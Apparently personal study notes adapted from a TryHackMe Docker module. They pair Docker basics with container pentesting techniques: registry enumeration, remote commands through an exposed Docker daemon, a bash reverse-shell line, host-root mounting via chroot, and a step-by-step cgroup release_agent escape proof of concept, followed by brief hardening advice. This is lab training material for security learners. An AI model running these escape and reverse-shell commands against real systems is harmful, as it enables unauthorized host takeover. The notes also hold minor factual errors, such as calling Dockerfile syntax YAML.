Docker Security & Pentesting

DISCLAIMER

This is a module from TryHackMe. Some of them i modified.

Definations

DockerEngine is essentially an API that runs on the host operating system, which communicates between the OS and Containers to access the system's hardware, Docker Engines allow us to connect dockers together, export and import containers and transfer files between the containers. DockerContainer: Containers are made to run independently of other processes, using only the resources they need. This means that containers only use the amount of memory, processing and do not interact with one another DockerHub: Users can create, store, manage test, and distribute Docker images using the cloud-based registry know as Docker hub. DockerImages: A Docker images serves as a template for constructing container. Using the build command, one can produce docker images, compared to vitual machines, Docker images develop significantly more quickly and use a lot less storage. DockerRegistry: All Docker images are kept in the docker registry. Users can utilize a public registry like Docker Hub or a local registry on their computer.


How Dockers are built?

Docker uses the programming syntax yaml to allow developers to instruct how a container should be built and what is run. This is significant reason why Docker is so portable and easy to debug. by the instructions and the commands, dockers can be built and run any device. All instructions are stored in the images which dictate how the container will be built and deployed that's why docker containers are sharing using images.


Cheat sheet

docker system info

docker rm CONTAINER_ID
docker stop CONTAINER_ID
docker rm -f CONTAINER_ID     //-f which forcefully removes the container
docker logs <container_id_or_name>
sudo netstat -tuln | grep ':80'
sudo lsof -i :80

docker image ls --digests


Building a Docker Container from Scratch

  • /var/lib/docker

  • /snap/bin/docker

  • Docker daemon configuration file /etc/docker/daemon.json

  • ~/.docker Docker-related configuration files

Create Your Dockerfile for the Docker Image

Docker requires a working Dockerfile for its builds. Here, we will create a Dockerfile that sets up an Ubuntu image with Apache acting as a web server and using the standard HTTP port 80.

At the command prompt (either via SSH or Lish in the Linode Manager), create and change to a new directory:

mkdir ~/mydockerbuild && cd ~/mydockerbuild

Dockerfiles are formatted in the following way:

  • Instruction

  • Argument. #Example_Dockerfile:

FROM ubuntu
MAINTAINER John Doe jdoe@example.com
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update
RUN apt-get upgrade -y
RUN apt-get install apache2 -y
RUN apt-get clean
EXPOSE 80
CMD ["apache2ctl","-D","FOREGROUND"]
RUN touch test.txt

Basic Definitions

  • FROM: Define the base image, such as ubuntu or debian, used tot the buildild process. Required for each Dockerfile.

  • MAINTAINER: Define the full name and email address of the image creator.

Variables**

  • ENV: Set environment variables that persist when the container is deployed.

  • ARG: Set a passable build-time variable. Can be used as an alternative to ENV to create a variable that does not persist when the container is deployed from the image.

Command Execution**

  • RUN: Execute commands, such as package installation commands, on a new image layer.

  • CMD: Execute a specific command within the container that is deployed with the image, or set default parameters for an ENTRYPOINT instruction. Only one is used per Dockerfile.

  • ENTRYPOINT: Set a default application to be used every time a container is deployed with the image. Only one is used per Dockerfile.

  • USER: Set the UID (the username) to run commands in the container.

  • WORKDIR: Set the container path where subsequent Dockerfile commands are executed.

[Note] RUN, CMD, and ENTRYPOINT can each be run in shell form, which takes normal arguments, or exec form, which takes arguments as a JSON array. Because exec form does not invoke a command shell, it is generally preferred and utilized in this guide.

Data Management**

  • ADD: Copy files from a source to the image’s filesystem at the set destination with automatic tarball and remote URL handling.

  • COPY: Similar to ADD but without automatic tarball and remote URL handling.

  • VOLUME: Enable access from a specified mount point in the container to a directory on the host machine.

Networking**

  • EXPOSE: Expose a specific port to enable networking between the container and the outside world.


Building the Docker with the image

After we have created an image, we can then proceed and build a docker container.

docker build -t testdocker .

[-t] is used to name the docker container [.] specifies the path to the dockerfile that we built abode.

Important notice for image creation

  1. Caching: Docker builds images in layers, and it tries to cache intermediate layers to speed up the build process. If the contents of the Dockerfile and the context (files and directories used during the build) haven't changed since the previous build, Docker may reuse cached layers, resulting in the new image having the same creation time as the previous one.

  2. Tagging: When you build a new Docker image, if you use the same tag as the previous one (e.g., latest or a custom tag), Docker overwrites the previous image with the new one under the same tag. While the content of the image may be different, the metadata associated with the image (including creation time) remains the same. [--no-cache] options forces to rebuild all the layer from scratch.

docker build --no-cache -t your_image_name .

Running Docker Container.

we can run the docker after we have built in with the below commnad.

docker run -d --name apachewebserver -p 80:80 testdocker.

lets go to the basic syntex.

docker run [OPTIONS] IMAGE_NAME [COMMAND]

example

docker run -it nginx /bin/bash


docker run --name kali -it kalilinux/kali-rolling /bin/bash

[-it] interact with the container and the command.

the bellow command runs the container in the background [Detach mode]

docker run -d nginx /bin/bash

the below command binds a port for the docker to listen on. you would use this instruction if you are running an application or service (such as web server)in the container and wish to access the application/service by navigating to the IP address.

docker run -p 80:80 nginx

The below command remove the docker once it has finished running.

docker run --rm nginx

One you finished running the container, you can view a list of the running and stopped containers using the below command.

docker ps -a

[the container's ID/what command is the container running/what was the container created/what port are mapped/ the name of container]


Building the Container from downloading & running a ready docker image file.

we need two item:

  • The container image name: for example an image name could be [Nginx]

  • The tag: The tag is used to specify different variations of an image. Ex: same name but diff tags. indicate diff version.

  • [name:tag]

docker pull ubuntu:latest

latest or specific version of a docker file

docker pull ubuntu:latest
docker pull ubuntu:22.04

Auditing Docker Image

To list all images stored on the local system in addition to verifying if an image has been downloaded correctly and to view a little bit more information about it,

docker image ls

Removing a docker image

docker image rm ubuntu:22.04

Running & Building Multiple Containers Together

DockerCompose allows use to create these “microservices” as one singular “service” to run more dynamic and complex applications such as an apache webserver and a mysql DB, because more often that applications require additional services to run, which we cannot do it in a sigle container. [Docker Compose] is the solution for that

Installing Docker Compose

https://docs.docker.com/compose/reference/
https://docs.docker.com/compose/install/

Docker-compose.yml

This file is extremly important for efficient deployment, management and run.

https://docs.docker.com/compose/compose-file/

#Scenario lets assume we want to run an ecommerce website that uses mysql DB. we need more that one container therefore we choose [docker compose] first we care the [YAML]config file

version: '3.3'
services:
  web:
    build: ./web
    networks:
      - ecommerce
    ports:
      - '80:80'


  database:
    image: mysql:latest
    networks:
      - ecommerce
    environment:
      - MYSQL_DATABASE=ecommerce
      - MYSQL_USERNAME=root
      - MYSQL_ROOT_PASSWORD=helloword
    
networks:
  ecommerce:

[Version] [Services] [build] [network] [ports]


Docker vs Virtual Machines

Docker looks similar to virtual machines, but the difference is that is runs directly on the kernel of the host.


When the Docker comes to pentesting

The concept of pentesting docker containers


How Dockers get Compromised?

Usually attackers will compromise a container through the external facing application. if it is a web application, it can be exploited in the same way as other web applications. So basically attackers will compromise the software/service/application running within a specific container using traditional tools/attack methods/procedures and then leverage the attack by little modification to exploit the internals of application.

If an attacker managed to exploit a web application running inside a container and get a shell access, the exploitation and access will be limited to that container environment alone and may not lead to the exploitation of the containers host. Sometimes this single/monolithic environment will provide pos-exploitation opportunities for the attackers just like how they will it in the traditional network.

Important remarks before you start

  • Every docker container has an ID and you will need this ID when you want to enumerate the container.

Indication of Docker container.

  • .dockerenv file in the root file system.

  • In the home directory of the user permissions showing ids instead of names.

  • The user on the home directory, some of them or all of them dont exist in /etc/passwd which means that the home directory was mounted from the host.

mount | grep username
  • You find Docker in the process list

ps auxww | grep docker  

Enumeration of the docker containers.

Local Dockers

These type dockers you find when you first get a foothold on the machine.

Writable Docker-socket

we check if /var/run/docker.sock is writable and by whom. Also we check the running process and see if the docker is listening on a port. The aim is to escape the docker and dump the root file system.

Listing docker images.

docker -H tcp://localhost:8080 container ls

Executing commands

docker -H tcp://localhost:8080 container exec sweettoothinc whoami

Executing reverse shell

docker -H tcp://localhost:8080 container exec sweettoothinc bash -i >& /dev/tcp/&MY_IP/9999 0>&1

[Note : more are in RCE via Exposed Docker Daemon]


Docker Containers Vulnerability


Docker Registry Exploitation

Goal

The Goal of exploiting docker registries is grabbing the manifests file which contains valuable information about the application such as size, layers in addition to the [history] section that may reveal commands and credentials that were used when the docker image was first built and run. (https://docs.docker.com/registry/)

Defination

At their core, docker registries serve as repositories for published Docker images. Creator of docker images can easily switch between different iterations of their apps and share them with others by using repositories. Although there are public registries like DockerHub, many Docker using organizations have their own "private" registry.

Discovery

Docker registries run on port 5000/7000 by default but this can changed. if you found these ports in your nmap scan it means Docker registry is running.

Enumeration

We can interact with Docker using several tools

  • postman [https://www.postman.com/downloads/]

  • Insomnia [https://insomnia.rest/download/]


Listing all stored repos in the Docker registry

we send a GET req to the target domain on the port the docker registry is listening on.

http://docker-domain.com:5000/v2/_catalog

Listing the associated tags with the selected repo

From the last step, we will have listed all the repos published on the docker registry of the target. In order to interact with a specific repository we need its tag that specific version requirements. Lets say one of the repositories name is /web/app to the list the tags we send via GET req.

http://docker-domain.com:5000/v2/web/app/tags/list

Grabbing the Manifest file

The manifest file contains pieces of information about the application, such as size, layers and other information so it forms a useful piece of information to get a hold of. We can retrieve the manifest file with the below GET request after having selected the repository and the tag. lets assum [tag1]

http://docker-domain.com:5000/v2/web/app/manifest/tag1

in the manifests file, you will be able to extract useful information about the commands that were executed with the docker first was published and run. These command may contain sensitive information such as passwords, database creds etc.


Docker Image Reverse Engineering

Goal

The goal of reverse engineering docker images is to obtain information on the commands and instructions used to build the image in a detailed fashion. This could reveal useful information such as credentials and cmds.

Pulling The image

First we pull the target image from its repository.

docker pull domain.com/ubuntu/latest

Then make sure to obtain the image is by running

docker images

Reverse Engineering the Image

Dive acts as a man-in-the-middle between ourselves and Docker when we use it to run a container.

Uploading Malicious Docker Images

Uploading Malicious Docker Images

When discussing the exploitation of Docker registries, one potential avenue for attackers is uploading malicious Docker images. This malicious activity involves uploading Docker images that contain harmful payloads, vulnerabilities, or backdoors, with the intention of compromising systems or stealing sensitive information.

Goal

The goal of uploading malicious Docker images is to introduce unauthorized or malicious code into the target environment. Attackers may aim to exploit vulnerabilities in Docker images or containers to gain unauthorized access, execute arbitrary commands, or exfiltrate data from the compromised systems.

Methods

  1. Malicious Payloads

  2. Backdoors: Malicious images may contain backdoors or hidden functionalities that allow attackers to maintain persistence

  3. Exploiting Vulnerabilities: upload Docker images that contain known vulnerabilities or exploit code targeting weaknesses in specific software components. further exploitation or lateral movement

Detection and Mitigation

  • Image Scanning

  • Access Controls

  • Content Validation

  • Container Isolation

  • Continuous Monitoring


Evidence

[1]"Dockerfile" that uses the Docker RUN instruction to execute "netcat" within the container to connect to our machine!

[2]We compile this into an image with docker build. Once compiled and added to the vulnerable registry, we set up a listener on our attacker machine and wait for the new image to be executed by the target.


RCE via Exposed Docker Daemon

Unix Socket 101 (No Travel Adapter Required)

UNIX socket(Unix domain socket) accomplishes the same job as its networking sibling - moving data, albeit all within the host itself by using the filesystem rather than networking interfaces/adapters; Interprocess Communication (IPC) is an essential part to an operating system. Due to the fact that UNIX sockets use the filesystem directly, you can use filesystem permissions to decide who or what can read/write. There was an interesting benchmark test between using both types of sockets for querying a MySQL database. Notice in the screenshot below how there are an incredibly higher amount of queries performed when using UNIX sockets; database systems such as Redis are known for their performance due to this reason. other uses [Bi-directional Communication/Stream or Datagram mode//File system permission]

How does this pertain to Docker?

Users interact with Docker by using the Docker Engine. For example, commands such as docker pull or docker run will be executed by the use of a socket - this can either be a UNIX or a TCP socket, but by default, it is a UNIX socket. This is why you must be a part of the "docker" group to use the docker command

Automating all the things

Developers love to automate, and this is proven nonetheless with Docker. Whilst Docker uses a UNIX socket, meaning that it can only interact from the host itself. However, someone may wish to remotely execute in Docker management tools like Portainer or DevOps applications like Jenkins to test their program. The daemon must use a TCP socket instead, permitting data for the Docker daemon to be communicated using the network interface and ultimately exposing it to the network for us to exploit.


Confirming vulnerability

After enumerate the port with nmap

curl http://10.10.69.250:2375/version

And note that we receive a response will all sorts of data about the host - lovely!

Execute

We'll perform our first Docker command by using the "-H" switch to specify the Instance to list the containers running

docker -H tcp://10.10.69.250:2375 ps

Experiment

[network ls]Used to list the networks of containers, we could use this to discover other applications running and pivot to them from our machine! [images]List by containers, data can also be exfiltrated by RE the image. [exec] [run]

Gaining shell

docker -H tcp://10.10.69.250:2375 run -v /:/mnt --rm -it chroot /mnt sh

docker -H tcp://10.10.69.250:2375 run -v /:/mnt --rm -it frontend chroot /mnt sh

Experiment with some Docker commands to enumerate the machine, try to gain a shell onto some of the containers and take a look at using tools such as rootplease to use Docker to create a root shell on the device itself.


Escape via Exposed Docker Daemon

Looking for the exposed Docker socket

cd /var/run
			docker.sock
groups
			have to be a docker group

Mount host volumes

[Note: 1/2 = The user must be in docker group. 2/2 = If we see the container but we cant see the images we cant mount this]

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

docker run: run a Docker container. -v /:/mnt: mounts the root directory of the host (/) into the /mnt directory inside the container. This allows the container to access and manipulate files and directories on the host filesystem. The syntax for the -v option is -v <host_path>:<container_path>. --rm: This option tells Docker to automatically remove the container when it exits. -it: These options are used together to allocate a pseudo-TTY (-t) and keep STDIN open (-i) so that you can interact with the container's shell. alpine: lightweight Linux distribution often used for Docker containers. chroot /mnt sh: changes the root directory of the current process to /mnt using the chroot command, effectively making /mnt the new root directory within the container. starts a new shell (sh) within this chroot environment.


Shared Namespaces

Let's backpedal a little bit...

containers have networking capabilities and their own file storage...I mean we have previously used SSH to connect to the container into them and there were files present! They achieve this by using three components of the Linux kernel:

  • Namespaces

  • Cgroups

  • OverlayFS Namespaces essentially segregate system resources such as processes, files and memory away from other namespaces.

Every process running on Linux will be assigned two things:

  • A namespace

  • A process identifier (PID)

Namespaces are how containerization is achieved! Processes can only "see" the process that is in the same namespace - no conflicts in theory. Take Docker for example, every new container will be running as a new namespace, although the container may be running multiple applications (and in turn, processes). [Example] we can see system user the process is running as then the processes number. There are a few more columns that aren't worth explaining for this task. But notice in the last column, the command that is running. I've highlighted a Docker command running, and an instance of Google Chrome running. You can see I have a considerable amount of processes running.

Let's list the processes running in our Docker container using ps aux It's important to note that we only have 6 processes running. This difference is a great indicator that we're in a container.

Here's why it matters to us:

Put simply, the process with an ID of 0 is the process that is started when the system boots. Processes numbers increment and must be started by another process, so #1. This process is the systems init , for example, the latest versions of Ubuntu use systemd.

We can use process #1's namespace on an operating system to escalate our privileges. Whilst containers are designed to use these namespaces to isolate from another, they can instead, coincide with the host computers processes, rather than isolated from...this gives us a nice opportunity to escape!

Getting started

ps aux. Now we can see the whole systems process...

The exploit here is actually rather trivial, but I'll digress nonetheless. We'll be invoking the nsenter command. To summarise, this command allows you to execute start processes and place them within the same namespace as another process.


Exploit


Misconfigured Privileges (Deploy #2)

Understanding Capabilities

Containers running in user mode interact with the operating system through the Docker Engine. Privileged containers, however, do not do this... instead, they bypass the Docker engine and have direct communication with the OS.

What does this mean for us?

if a container is running with privileged access to the OS, we can effectively execute commands as root.

We can use a system package such as "libcap2-bin"'s capsh To check the privileges of the container, we run the below command inside a docker container shell

capsh --print

capsh --print | grep sys_admin

This capability permits us to do multiple of things (which is listed here), but we're going to focus on the ability given to use us via "sys_admin" to be able to mount files from the host OS into the container.

Exploitaion

The code snippet below is based upon (but a modified) version of the Proof of Concept (PoC) created by Trailofbits where they detail the inner-workings to this exploit well.

We aim mainly to mount Files from host filesystem into the container. Then on the docker shell, execute the below command

1.  mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

2.  echo 1 > /tmp/cgrp/x/notify_on_release

3.  host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

4.  echo "$host_path/exploit" > /tmp/cgrp/release_agent 

5.  echo '#!/bin/sh' > /exploit

6.  echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit

7.  chmod a+x /exploit

8.  sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Let's briefly summarize what happens here:

[1] We need to create a group to use the Linux kernel to write and execute our exploit. The kernel uses "cgroups" to manage processes on the operating system since we have capabilities to manage "cgroups" as root on the host, we'll mount this to "/tmp/cgrp" on the container.

[2] For our exploit to execute, we'll need to tell Kernel to run our code. By adding "1" to "/tmp/cgrp/x/notify_on_release", we're telling the kernel to execute something once the "cgroup" finishes. (Paul Menage., 2004)

[3] We find out where the containers files are stored on the host and store it as a variable

[4] Where we then echo the location of the containers files into our "/exploit" and then ultimately to the "release_agent" which is what will be executed by the "cgroup" once it is released.

[5] Let's turn our exploit into a shell on the host

[6] Execute a command to echo the host flag into a file named "flag.txt" in the container, once "/exploit" is executed

[7] Make our exploit executable!

[8] We create a process and store that into "/tmp/cgrp/x/cgroup.procs"


Securing Your Container

Let's reflect back on the vulnerabilities that we have exploited. Not only have we learnt about the technology that is containerization, but also how these containers are a mere abstraction of the host's operating system.

  1. The Principle of Least Privileges: Whilst this is an over-arching theme of InfoSec as a whole, we'll pertain this to Docker...

Remember Docker images? The commands in these images will execute as root unless told otherwise. Let's say you create a Docker image for your webserver, in this case, the service will run as root. If an attacker managed to exploit the web server, they would now have root permissions to the container and may be able to use the techniques we outlined in Task 10 and 11.

  1. Docker Seccomp 101: Seccomp or "Secure computing" is a security feature of the Linux kernel, allowing us to restrict the capability of a container by determining the system calls it can make. Docker uses security profiles for containers. For example, we can deny the container the ability to perform actions such as using the mount namespace (see Task 10 for demonstration of this vulnerability) or any of the Linux system calls.

  2. Securing your Daemon: In later installs of the Docker engine, running a registry relies on the use of implementing self-signed SSL certificates behind a web server, where these certificates must then be distributed and trusted on every device that will be interacting with the registry. This is quite the hassle for developers wanting to setup quick environments - which goes against the entire point of Docker.


Determining if we're in a container

Listing running processes:

Looking for .dockerenv

Containers allow environment variables to be provided from the host operating system by the use of a ".dockerenv" file. This file is located in the "/" directory, and would exist on a container - even if no environment variables were provided: cd / && ls -lah

Those pesky cgroups

Additional Material:

The Dirtyc0w kernel exploit Exploiting runC (CVE-2019-5736) Trailofbits' capabilities demonstration Cgroups101


  • The Great Escape

  • dockerrodeo

  • marketplace

  • Intro to docker

Last updated